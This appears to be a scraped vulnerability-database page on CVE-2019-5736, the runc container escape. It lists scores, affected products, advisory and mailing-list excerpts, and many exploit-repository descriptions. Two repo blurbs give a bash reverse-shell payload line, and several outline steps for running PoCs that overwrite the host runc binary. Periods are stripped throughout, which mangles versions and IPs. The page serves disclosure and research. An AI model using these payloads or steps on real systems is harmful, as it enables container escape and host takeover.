CVE-2019-5736

Published: 11/02/2019 Updated: 16/12/2021
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.6 | Impact Score: 6 | Exploitability Score: 1.8
VMScore: 972
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

runc up to and including 1.0-rc6, as used in Docker prior to 18.09.2 and other products, allows malicious users to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.

Vulnerable Product

docker docker

linuxfoundation runc

linuxfoundation runc 1.0.0

redhat container development kit 3.7

redhat openshift 3.4

redhat openshift 3.5

redhat openshift 3.6

redhat openshift 3.7

redhat enterprise linux 8.0

redhat enterprise linux server 7.0

google kubernetes engine -

linuxcontainers lxc

hp onesphere -

netapp hci management node -

netapp solidfire -

apache mesos

opensuse backports sle 15.0

opensuse leap 15.0

opensuse leap 15.1

opensuse leap 42.3

d2iq kubernetes engine

d2iq dc/os

fedoraproject fedora 30

fedoraproject fedora 29

canonical ubuntu linux 16.04

canonical ubuntu linux 18.04

canonical ubuntu linux 18.10

canonical ubuntu linux 19.04

microfocus service management automation 2018.02

microfocus service management automation 2018.05

microfocus service management automation 2018.08

microfocus service management automation 2018.11

Vendor Advisories

Synopsis Important: docker security update Type/Severity Security Advisory: Important Topic An update for docker is now available for Red Hat Enterprise Linux 7 Extras. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base s ...
Synopsis Important: runc security update Type/Severity Security Advisory: Important Topic An update for runc is now available for Red Hat Enterprise Linux 7 Extras. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score ...
Synopsis Important: container-tools:rhel8 security and bug fix update Type/Severity Security Advisory: Important Topic An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Com ...
Synopsis Important: Container Development Kit 370-1 security update Type/Severity Security Advisory: Important Topic Red Hat Container Development Kit 370-1 update is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring Sys ...
Synopsis Important: OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7. Red Hat Product Security has rated this update as having a security impact of Im ...
Debian Bug report logs - #922050 runc: CVE-2019-5736 Package: src:runc; Maintainer for src:runc is Debian Go Packaging Team <pkg-go-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Mon, 11 Feb 2019 15:18:01 UTC Severity: grave Tags: patch, security, upstream Found in ...
Docker could be made to overwrite files as the administrator ...
Debian Bug report logs - #922059 flatpak: CVE-2019-8308: vulnerability similar to runc CVE-2019-5736 involving /proc/self/exe Package: flatpak; Maintainer for flatpak is Utopia Maintenance Team <pkg-utopia-maintainers@listsaliothdebianorg>; Source for flatpak is src:flatpak (PTS, buildd, popcon) Reported by: Simon McVitti ...
Debian Bug report logs - #929733 firejail: CVE-2019-12499: binary can be truncated by root under certain conditions Package: src:firejail; Maintainer for src:firejail is Reiner Herrmann <reiner@reiner-hde>; Reported by: Reiner Herrmann <reiner@reiner-hde> Date: Wed, 29 May 2019 17:24:02 UTC Severity: important Tags ...
A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system ...
A vulnerability was discovered in runc, which is used by Docker to run containers. runc did not prevent container processes from modifying the runc binary via /proc/self/exe. A malicious container could replace the runc binary, resulting in container escape and privilege escalation. This was fixed by creating a per-container copy of runc(CVE-2019- ...
Arch Linux Security Advisory ASA-201902-20 ========================================== Severity: High Date : 2019-02-17 CVE-ID : CVE-2019-5736 Package : flatpak Type : privilege escalation Remote : Yes Link : securityarchlinuxorg/AVG-880 Summary ======= The package flatpak before version 123-1 is vulnerable to privilege esc ...
Arch Linux Security Advisory ASA-201902-6 ========================================= Severity: High Date : 2019-02-11 CVE-ID : CVE-2019-5736 Package : runc Type : privilege escalation Remote : Yes Link : securityarchlinuxorg/AVG-878 Summary ======= The package runc before version 100rc6-1 is vulnerable to privilege escalati ...
A vulnerability discovered in runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, ...
A vulnerability in the Open Container Initiative runc CLI tool used by multiple products could allow an unauthenticated, remote attacker to escalate privileges on a targeted system. The vulnerability exists because the affected software improperly handles file descriptors related to /proc/self/exe. An attacker could exploit the vulnerability eithe ...
IBM Cloud Private is affected by an issue with runc used by Docker. The vulnerability allows a malicious container to overwrite the host runc binary and thus gain root-level code execution on the host ...
PowerKVM is affected by a vulnerability in Docker. IBM has now addressed this vulnerability ...
IBM Cloud Kubernetes Service is affected by a security vulnerability in runc which could allow an attacker that is authorized to run a process as root inside a container to execute arbitrary commands with root privileges on the container’s host system ...

Exploits

## CVE-2019-5736 ## This is exploit code for CVE-2019-5736 (and it works for both runc and LXC) The simplest way to use it is to copy the exploit code into an existing container, and run `makesh` However, you could just as easily create a bad image and run that ```console % docker run --rm --name pwnme -dit ubuntu:1810 bash pwnme % docker cp ...
# Usage Edit HOST inside `payloadc`, compile with `make` Start `nc` and run `pwnsh` inside the container # Notes - This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the payload It'll also overwrite `/bin/sh` inside the container - Tested only on Debian 9 - No attempts were made to make it stable o ...

Mailing Lists

This Metasploit module leverages a flaw in runc to escape a Docker container and get command execution on the host as root This vulnerability is identified as CVE-2019-5736 It overwrites the runc binary with the payload and waits for someone to use docker exec to get into the container This will trigger the payload execution Note that executing ...
Someone outside of the embargo has posted a PoC of the exploit for CVE-2019-5736 (which is related though not using the same vector)[1] Since the original researchers have posted a blog post explaining the exploit in some detail[2], I've decided to post the exploit code early -- since the cat is out of the bag anyway CVE-2019-5736tarxz has the ...
Hello, there is a container breakout currently discussed (CVE-2019-5736), which affected LXC among others Let me share two more, IMHO easier, breakout techniques that work against LXC, at least in Ubuntu 1810, which has LXC 303 Both techniques work only in privileged containers, and so, given that LXC upstream does not treat privileged contai ...
On 2019-02-13, Loganaden Velvindron <loganaden () gmail com> wrote: Yes, there is a PoC that someone outside of the embargo posted on GitHub (it is quite different to the one we have but it is using a related issue which our patch also fixed) At this point I might as well post the actual exploit code (given that the original vulnerability ...
Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Mesos 140 to 170 The unsupported Apache Mesos pre-140 releases may be also affected Description: A specifically crafted Docker image running under the root user can overwrite the init helper binary of the Mesos container runtime and/or the Mesos command e ...
On Tue, Feb 12, 2019 at 12:05:20AM +1100, Aleksa Sarai wrote: [] While runc, LXC, and maybe other projects fix CVE-2019-5736 in userspace, Virtuozzo/OpenVZ 7 has just released a kernel fix instead - please see the forwarded message below Following links from there, I found the following description of the issue in context of Virtuozzo and ...
On Fri, Jun 28, 2019 at 02:57:43PM +0200, Solar Designer wrote: True, but we care about more than just the kernel side of things Can I suggest that we fork the discussion around security-bugsrst to LKML? I can suggest an initial patch to address your comments here but I think that this is better handled on LKML My concern with Monday is ...

Github Repositories

Exploit code

DOCKER-2019-5736 Exploit code for CVE-2019-5736 accessredhatcom/security/cve/cve-2019-5736 The container escape for Docker The exploit overwriting and executing the host systems runc binary from container Tested on Ubuntu 1604 and distro based Arch Docker versions 1806 go build maingo

Exploit for CVE-2019-5736 runc vulnerability

cve-2019-5736-exp This is a proof-of-concept (PoC) exploit for the CVE-2019-5736 vulnerability in runc, the runtime used in Docker Disclaimer I undertook this project as an exercise, for educational reasons and for fun It should go without saying that I do not support unethical and/or illegal misuse of this code Description The vulnerability was discovered by Adam Iwaniuk an

RunC-CVE-2019-5736 Video: bitly/2WqvILb Blog Post: [wwwidealhaxblogspotcom/2020/05/breaking-out-of-docker-via-runchtml] Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs Running the POCs Note that running the POCs will overwrite the runC binary on the host It is highly recommened that you create a copy

Docker auditing and enumeration script.

Blowhole Blowhole is a Python-based script that enumerates Docker container configurations and calls Dockerized auditing tools (Batten and Docker Security Benchmark) to investigate Docker configurations and settings on the host machine Usage python blowholepy -h usage: blowholepy [-h] [-i] [-a] -o OUTDIR Blowhole optional arguments: -h, --help show this help m

5G Telco Lab based on OpenShift

OpenShift 5G Telco Lab 1 - Introduction The 5G Mobile Network standard is built from the ground up to be cloud-native Over the years, and thanks to new standards, not only the legacy architectures have been decoupled (CUPS), but even more flexible initiatives (O-RAN) are now taking over the marker Many Telcos are moving to containerized architectures and ditching for good the

Hack The Box Guide by Alen Peric: The Notebook IP: 101010230 Summary: The Notebook introduces us to jwt token manipulation Lots of interesting lessons on base64 encoding/decoding, constructing cookies and manipulating them Great insight into transferring files using netcat This machine also shows us how to manipulate the docker exec environment for privilege escalation T

Doc-Dock Escaping Docker environments! Features: --privileged flag --privileged flag V2 (Kata Containers) CVE-2019-5736 Writable hostPath Mount

Kubesploit Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated for containerized environments written in Golang and built on top of Merlin project by Russel Van Tuyl (@Ne0nd0g) Our Motivation While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for

CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.

CVE-2019-5736-Custom-Sandbox General CVE-2019-5736 implemented using a shallow, self-written container runtime to understand the exploit Exploit is based on (and almost all copied from) the runc-poc by twistlock: githubcom/twistlock/RunC-CVE-2019-5736/tree/master/malicious_image_POC Container Runtime (quarantine) See code docs for further details Usage: quarantine [O

Docker breakout via runc Originally from : githubcom/Frichetten/CVE-2019-5736-PoC This repo is simply me messing around with the PoC and attempting to figure the exploit's flow

CVE-2019-5736

CVE-2019-5736 This is exploit code for CVE-2019-5736 (and it works for both runc and LXC) The simplest way to use it is to copy the exploit code into an existing container, and run makesh However, you could just as easily create a bad image and run that % docker run --rm --name pwnme -dit ubuntu:1810 bash pwnme % docker cp CVE-2019-5736tar pwnme:/CVE-2019-5736tar We need

PoC for CVE-2019-5736

CVE-2019-5736-PoC PoC for CVE-2019-5736 Created with help from @singe, @_cablethief, and @feexd Tested on Ubuntu 1804, Debian 9, and Arch Linux Docker versions 18091-ce and 18031-ce This PoC does not currently work with Ubuntu 1604 and CentOS Go checkout the exploit code from Dragon Sector (the people who discovered the vulnerability) here What is it? This is a Go imp

Slides, Cheatsheet and Resources from our Blackhat EU talk

'Reverse Engineering and Exploiting Builds in the Cloud' Conference Material Repository This repository contains material and slides for the talk Reverse Engineering and Exploiting Builds in the Cloud: cheatsheetmd contains multiple commands, Dockerfiles, YML configs that can assist you in your build environment reversing slidespdf are the presentation slides Re

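Awesome Cloud Native Security This repository is used to collect awesome resources on the topic of cloud native security found during research Hope to be helpful :) 1 Offensive 11 General 2018 NSFOCUS Container Security Technical Report 2020 NSFOCUS Cloud Native Security Technical Report China's first cloud container ATT&CK attack and defense matrix released, Alibaba Cloud helps enterprises implement container security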

My attempt at bashing my way through Kubernetes The Hard Way with the help of the Linux Academy course (Kubernetes The Hard Way) Cluster Consists of the following nodes: 1 * API loadbalancer @ 1GB 1 * Bastion/client server @ 1GB 2 * Controller nodes @ 2GB 2 * Worker nodes @ 1GB Notes: ** This is still a work in progress! service-cluster-ip-range=103200/24 cluster-cidr=1

Kira's Blog

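Kira's Blog Docker Building a Keepalived high-availability cluster with Docker Harbor Auth Token analysis Docker Registry manifest analysis Docker Registry authentication analysis Golang Analysis of the Golang startup process Implementation of Golang runtimegetg() Why Golang does not use a generational or compacting GC Go runtime scheduler Kubernetes Analysis of how runc starts a container (with the CVE-2019-5736 implementation process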

A quick way to manage various payloads and listeners

venom A quick way to manage various payloads and listeners Summary venompy is a tool that helps you manage payloads and listeners

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

Dirty Pipe Container Escape Write-up: Using the Dirty Pipe Vulnerability to Break Out from Containers This repository contains a proof of concept exploit leveraging the Dirty Pipe vulnerability (CVE-2022-0847) to break out from an underprivileged container Tested on a Kernel 5100-0 with runc 102 on Kubernetes 1227, but should work on any vulnerable kernel See also: The

CVE-2019-5736 POCs

RunC-CVE-2019-5736 Two PoCs for CVE-2019-5736 See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him Running the PoCs Note that running the PoCs will overwrite the runc binary on the host It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc)

HTB Write-ups *nix Box Difficulty Writeup Foothold Privesc Easy armageddon Drupal: drupalgeddon2 snap install with sudo Medium ophiuchi SnakeYAML Deserilization exploit wasm reversing Medium Ready SSRF in gitlab 1147 Docker Privileged Mode Easy scriptKiddie command_injection in msfvenom msfconsole with sudo Easy Spectra wordpress admin rev_shell initc

A curated list of awesome Docker security resources

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs OWASP Docker Security Introduction to Container Security Understanding

BetDocker A vulnerable docker container simulating a Gambling website business Comes with docker-compose files for easy setup and guidance, installed with a Netcat backdoor, a LDAP server and a hosted laravel website DISCLAIMER This is an insecure docker container which should only be used for local environments The scenario was used with an insecure version of docker susce

-1nf1n17yk1ng- CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build maingo

Docker Security An ongoing & curated collection of awesome software, libraries and frameworks, best guidelines and technical resources and cool stuff about Docker Security Docker is a software platform that allows you to build, test, and deploy applications quickly Docker packages software into standardized units called containers that have everything the software n

Docker and Kubernetes Docker Getting started Local credentials Build General commands Run History Audit Copy Remove python Sidecar design pattern Docker CVEs References circleci local setup On every configyaml change, run Environment variables Resources Snyk Setup Test dependencies Monitor for new vulnerabilities Kubernetes Deploy and Monitor Parse deploy file kub

Proof of concept code for breaking out of docker via runC

Breaking out of Docker via RunC A proof of concept code for CVE-2019-5736 This POC is heavily based on YuvalAvra's POC I do not claim any credit for the code utilised in this POC More information about this vulnerability and a demonstration of how it can be exploited can be found in the worksheet Information in the worksheet is based a blog post by Twistlock Labs Usage

whoc A container image that extracts the underlying container runtime and sends it to a remote server Poke at the underlying container runtime of your favorite CSP container platform! How does it work? As shown by runc CVE-2019-5736, traditional Linux container runtimes expose themselves to the containers they're running through /proc/self/exe whoc uses this link to read

-k4u5h41- CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10101412/1234 0>&1" After that, run: go build maingo

Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git

Docker-Runc-Exploit Docker runc CVE-2019-5736 exploit Dockerfile Credits : githubcom/Frichetten/CVE-2019-5736-PoCgit

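A record of articles read online in 2019

Below is a month-by-month summary of what I read over the 12 months of 2019; most of the articles are foreign security articles whose titles have been translated into Chinese; Penetration Using Exchange in penetration testing The article provides some good scripts, rather than just brute forcing 2019 OSINT guide The essence of penetration is information gathering; never give up; there will be a time when you feel you have explored every possibility for obtaining information. Do not give up.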

Guide and toolkit to harden Docker images

How to harden a Docker image: a tutorial for beginners This tutorial provides a basic overview of Docker and its security mechanisms, discusses best practices for creating Docker containers, and surveys a number of scanning and monitoring software to harden Docker images Table of Contents 1 How does Docker work? 2 How do Docker images interact with the host? 3 How are Docke

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

Docker Escape Tool Work In Progress This tool will help identify if you're in a Docker container and try some quick escape techniques to help assess the security of your containers This tool is focused specifically on Docker escapes though some of the logic may apply to other container runtimes I intend to follow this up with a blog post on helping secure your Docker co

A container analysis and exploitation tool for pentesters and engineers.

Break out the Box (BOtB) BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies What does it do? BOtB is a CLI tool which allows you to: Exploit common container vulnerabilities Perform common container post exploitation actions Provide capability when certain tools or b

website address: qingshan-cloud-securityuerappspotcom/ lab1 Write an “AppEngine Standard” App A simple event management website based on Flask + GCP All HTML and JavaScript is served statically to keep secure Users can upload events and dates, or delete events The website could update the remaining time of the event in real time and delete expire

Before running (1) Change the IP address in stage2c to the host's address (2) Build from the DockerFile docker build -t cve (3) docker run -d -t --name cvetest cve (4) Back up the runc binary before running cp /usr/bin/docker-runc /usr/bin/docker-runcbak (5) Run docker exec -it cve /bin/bash (6) in docker run cd /root && /ru

Docker commands

Docker command reminders Getting started Info docker info Version docker --version Check docker is running docker run busybox date Where is docker which docker List local images docker image ls Pull ( slim linux image ) docker pull alpine Quick setup docker pull alpine:latest docker run -it alpine Build Dockerfile, list, print commands inside Dockerfile and delete docker bui

Docker tutorial

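A summary of basic Docker usage Author: Yumingyuan Intention: Help anyone who is interested in docker Environment: Docker Desktop CE 2304 (46911) Contents (folder: description) Tutorial: how to use Docker containers CVE-2019-5736: analysis and reproduction of the CVE-2019-5736 exploit code Update history 2020-08-27: how to search for an image with search 2020-08-28: how to start an existing container 2020-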

cve-2019-5736-reproducer

CVE patches for legacy runc packaged with Docker

CVE Builds for legacy docker-runc This repo provides a backport of patches for CVE-2019-5736 for older versions of runc that were packaged with Docker Build and Releases Refer to the releases section of this repo for the binaries In order to build yourself, or build for different architectures, just run make and the binaries will end up in /dist The binaries will be of the

$50 Million CTF from Hackerone - Writeup

$50 million CTF Writeup Summary For a brief overview of the challenge you can take a look at the following image: Below I will detail each step that I took to solve the CTF, moreover all the bad assumptions that led me to a dead end in some cases Twitter The CTF begins with this tweet: What is this binary? My first thought was try to decode the binary on image’s backg

A curated list of starred project sorted by languages

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP Assembly Batchfile C C# C++ CMake CSS Cirru Clojure CoffeeScript Common Lisp Cuda D Dart Dockerfile Elixir Emacs Lisp Erlang F# Gherkin Gnuplot Go Groovy HCL HTML Haskell Inno Setup Java JavaScript Jsonnet Julia Jupyter Notebook Kotlin LLVM Lua Makefile Mathematica Nim OCaml Objective-C Othe

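Overview Product introduction Product concepts Usage notes Glossary Recommended cluster node configuration Operation guide Must-read before use Create a cluster Delete a cluster View clusters Add nodes kube-proxy kube-proxy mode selection kube-proxy mode switching Docker VS Containerd Cluster management Manage the cluster with Kubectl Introduction to the kubectl command line Install and configure kubectl Use web kubectl Cluster update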

Manipulate K8s in a K8s way

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

Tool to test if you're in a Docker container and attempt simple breakouts

Docker Escape Tool WIP This tool will help identify if you're in a Docker container and try some quick escape techniques Todo Refactor Move from relying on libcurl to Crystal's inbuilt networking once it gains support for UNIX sockets Improve installing the Docker client inside a container because currently I'm downloading a binary Checks This script asses

Cloud Native Security Resources for Cloud Native Security Research, such as Docker, Kubernetes, etc Pull request welcome Intro 2020:"Cloud Native Security: Container Security Practice" by Pray3r - article, CN Series of articles: Exploring Container Security by Google - articles Kernel and architecture Namespaces in operation by Michael Kerrisk - whitepaper Control g

Container Duck - Zero Dependency Docker/K8s Penetration Toolkit

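CDK Container Duck - Zero Dependency Docker/K8s Penetration Toolkit Introduction This tool is intended for lateral-movement scenarios after gaining access to a container environment, and addresses the following problems: Containers in production are stripped-down Linux systems that often lack common Linux commands and scripting environments such as Python, so traditional penetration tools cannot be used. This tool provides a native penetration toolset implemented in Golang. Integrates docker/k8s scenario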

Bitdefender introspection PoC for VBH This project demonstrates protection for three types of exploits: SMEP/SMAP disabling vDSO modifications runc overwrite SMEP/SMAP disable Overview SMEP: If set, execution of code in a higher ring generates a fault SMAP: If set, access of data in a higher ring generates a fault A malicious program may disable SMAP in order to access dat

Some POCs or Exploits for vulnerabilities

Exploit for CVE-2019-5736 Version 1 (inspired by original idea DragonSector) use a maliciousso(which used by runc) with malicious entry point (like #!/proc/self/exe) to hijack the execution of runc, and then open '/proc/self/exe' to hold the file descriptor Then 'fork-exec' to run another process, and the child process will inherit the file descriptor F

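Kubernetes attack and defense from scratch This material is based on the blog post I originally published at Tencent, "A record of cloud-native vulnerability discovery and exploitation in red-blue exercises", and is continuously updated and improved to overcome the limitation that an official account cannot be corrected and adjusted in a timely way; and because attack and defense techniques for Kubernetes security features, container security and similar scenarios keep developing and changing, the content of the article will also be adjusted continuously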

This repository contains a set of vulnerable Docker images for attacking the container environment compiled for Cyber_Security hackathon 2021 Requirements The sweep procedure was performed on Centos 8 with the latest kernel version (you are free to choose your operating system) and with necessary libraries defined below Clone this repository: [root@localhost]# sudo yum -y ins

Cloud-Native-Security-Test Building container-cloud test images, article link Image preparation Download the build environment (I have already packaged it on github) mkdir -p /root/docker/ cd /root/docker git clone githubcom/ShadowFl0w/Cloud-Native-Security-Testgit Prepare other tools cd /root/docker/Cloud-Native-Security-Test #Download Tomcat wget archive

Docker Security Checklist For a more thorough checklist please refer to the latest Docker CIS benchmark Patching Ensure you patch your Docker daemon/containerd etc to protect against escape CVEs such as CVE-2019-5736 CVE-2019-14271 CVE-2020–15257 Follow appropriate Docker security updates Image security Conduct image vulnerability scanning using an appropriate scann

My security researches involving Docker (LPE)+OPENSHIFT

dockerevil A simple repository to store my security flaws in the docker technology 2020 Dockerevil Exploit 2019 CodeStudent1995 Based Exploit OpenShift Privilege Escalation(oc) 2016 - 2017 Docker API Privilege Escalation(LPE/RPE) Escalate from Offline Server/Minimal Images/Build from TAR Dockerfile Docker SUDO Privilege Escalation (PoC) Nmap Scripts Other awesome secu

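pipe-primitive An exploit primitive in linux kernel inspired by DirtyPipe (CVE-2022-0847) A while ago, like many security veterans before me, I studied and reproduced the DirtyPipe (CVE-2022-0847) vulnerability and came to appreciate how handy this bug is: it starts from an uninitialized-memory issue and ends in modification of arbitrary files, without involving a KASLR leak or operations such as ROP and JOP along the way.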

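Applications containing vulnerabilities Server setup: Except for the jump host, all hosts are on the internal network. Host A has two addresses, one external and one internal. The other hosts have only internal addresses. There are two virtual network devices on the internal network: one is a virtual router, responsible for routing internal traffic. The other is a NAT gateway, which has an external address and is responsible for the external requests routed to it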

Title Solution to the Python reverse encryption script that is provided in the Bold: Italic Title 2 sample code Alen & Mitch’s Hack E’Spezialle Essential Gadget Collection: Legion - Nmap but through GUI Dirsearch - Directory discovery tool Gobuster -Directory/Sub-domain and DNS Discovery Tool wwwhackingarticle

exploit exp for useful vuln cve-2019-5736 docker runc escape cve-2021-3156 sudo heap overflow privilege escalation cve-2021-21972 vmware vcenter rce showdoc vulnerability in showdoc, an online API documentation and technical documentation tool

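1 Introduction Some EXPs that can lead to container escape, with usage notes; all of the exps have been verified locally. 2 Vulnerability list Vulnerability Description CVE-2019-5736 runc vulnerability escape CVE-2017-7308 kernel vulnerability escape CVE-2016-5795 kernel vulnerability escape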

docker release version 2020-11-09 2501 Upgrades Compose CLI v102 Snyk v14242 Bug fixes and minor changes Fixed an issue that caused Docker Desktop to crash on MacOS 110 (Big Sur) when VirtualBox was also installed See docker/for-mac#4997 2020-11-09 2500 This release contains a Kubernetes upgrade Your local Kubernetes cluster will be reset after install

CDK - Zero Dependency Container Penetration Toolkit English | 简体中文 Legal Disclaimer Usage of CDK for attacking targets without prior mutual consent is illegal CDK is for security testing purposes only Overview CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency It c

CDK is an open-sourced container penetration toolkit, offering stable exploitation in different slimmed containers without any OS dependency. It comes with penetration tools and many powerful PoCs/EXPs that help you escape containers and take over K8s clusters easily.

Awesome container escape :)

Container Escape This repo is used to collect resources on the topic Container Escape, including PoCs, exploits, tools, slides and papers Vulnerabilities CVE PoC/ExP User Interaction Needed Info CVE-2016-5195 CVE-2017-1002101 CVE-2018-1002103 CVE-2018-1002105 CVE-2019-5736 CVE-2019-14271 CVE-2020-2023/2025/2026

中文 | English 1 Introduction Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically 11 Why Metarget? During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spen

Underground Nexus deployment Current version 080 Features that are missing: Minio is not being used right now because Minio has a conflicting port 9000 with Portainer Future plan to redirect port usage or take away port 9000 on Portainer There isn't the best bash script to check for logic on when there are certain resources that are already available A cli tool is c

Kaosagnt's Ansible Everyday Utils

Kaosagnt's Ansible Everyday Utils This project contains many of the Ansible playbooks that I use daily as a Systems Administrator in the pursuit of easy server task automation Installation You will need to setup and install Ansible like you normally would before using what is presented here Hint: it uses ansible wwwansiblecom Optional: Create an ansible-everyd

Awesome Container Escape Collections of container escape techniques Container Escape Techniques Name Type Info Status CVE-2016-5195 vuln/kernel CVE-2020-14386 vuln/kernel CVE-2018-15664 vuln/docker CVE-2019-14271 vuln/docker CVE-2019-5736 vuln/runc CVE-2017-1002101 vuln/k8s CVE-2018-1002105 vuln/k8s CVE-2020-8558 vuln/k8s CVE-2020-15257 v

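Resource repository for "Cloud Native Security: Attack and Defense Practice and System Construction" This repository provides supplementary material and accompanying source code for the book "Cloud Native Security: Attack and Defense Practice and System Construction", for interested readers to read further and practise. All content in this repository is for teaching and research use only; use for illegal purposes is strictly prohibited, and violators bear the consequences themselves! Supplementary reading 100_云计算简介pdf 101_代码安全p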

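Resource repository for "Cloud Native Security: Attack and Defense Practice and System Construction" This repository provides supplementary material and accompanying source code for the book "Cloud Native Security: Attack and Defense Practice and System Construction", for interested readers to read further and practise. All content in this repository is for teaching and research use only; use for illegal purposes is strictly prohibited, and violators bear the consequences themselves! Related links: Douban | JD.com | Dangdang Supplementary reading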

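PenetrationTesting English Version GitHub renders no more than 4000 lines of a README, while the tools and articles added to this repo run to nearly ten thousand lines, so by default not everything is shown. The current page is a cut-down version: tools with fewer than 200 stars and no update within 500 days are not shown in this document. Click here for the full version: Chinese - full version Contents Tools Newly added (854) Newly added Uncategorized Artificial intelligence&&a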

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification Resources Basics Tool URL Swaks githubcom/jetmore/swaks CyberChef gchqgithubio/CyberChef/ Information Gathering Tool URL Amass githubcom/OWASP/Amass AutoRecon githubcom/Tib3rius/AutoRecon Sparta gi

Free Download ControlPlane is sponsoring the first four chapters of the book, download them for free Hacking Kubernetes Running cloud native workloads on Kubernetes can be challenging: keeping them secure is even more so Kubernetes' complexity offers malicious in-house users and external attackers alike a large assortment of attack vectors In this book, Andrew Martin an

hacking tools awesome lists

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP Arduino Assembly AutoHotkey AutoIt Batchfile Boo C C# C++ CMake CSS CoffeeScript Dart Dockerfile Emacs Lisp Erlang Game Maker Language Go HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx OCaml Objective-C Objective-C++ Others PHP PLSQL P

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ASP ASPNET ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS Classic ASP CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Obj

Awesome Cloud Native Security This repository is used to collect AWESOME resources on the topic of cloud native security found during research Note: All resources will be suffixed and ordered by date of conferences, blogs or other formats of publication, if applicable Resources in sub-list are related to their parent entries For simplicity, resources would NOT be duplicat

IoT CVE The following repository represents an abnormal data collection strategy for a security system in IoT Based on a detailed risk assessment and collaboration with domain experts, the data collection framework should analyze patterns to spot potential threats and points of failure Obtaining valid, representative, and accurate data that reflects the context and environme

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL (1) ASPNET (1) ActionScript (1) Arduino (2) Assembly (7) AutoHotkey (2) Batchfile (16) BitBake (5) Boo (1) C (286) C# (212) C++ (225) CMake (2) CSS (66) Classic ASP (2) Clojure (1) CoffeeScript (1) ColdFusion (1) Dart (1) Dockerfile (37) Emacs Lisp (1) Erlang (1) F# (2) Go (531) HCL (4)

DevSecOps Kubernetes Playground (aka "A Hacker's Guide to Kubernetes") Note: Based on k8s Security HOWTO Prerequisite: Setup Pentest Infrastructure/Environment: Kubernetes kubeadm-based setup with terraform + ansible on ProxMox (pfSense VM as Firewall/VPN/LB + k8s nodes VMs) Objective: Kubernetes has historically not been security hardened out of the box! (defaul

A collection of the various good tools I come across day to day

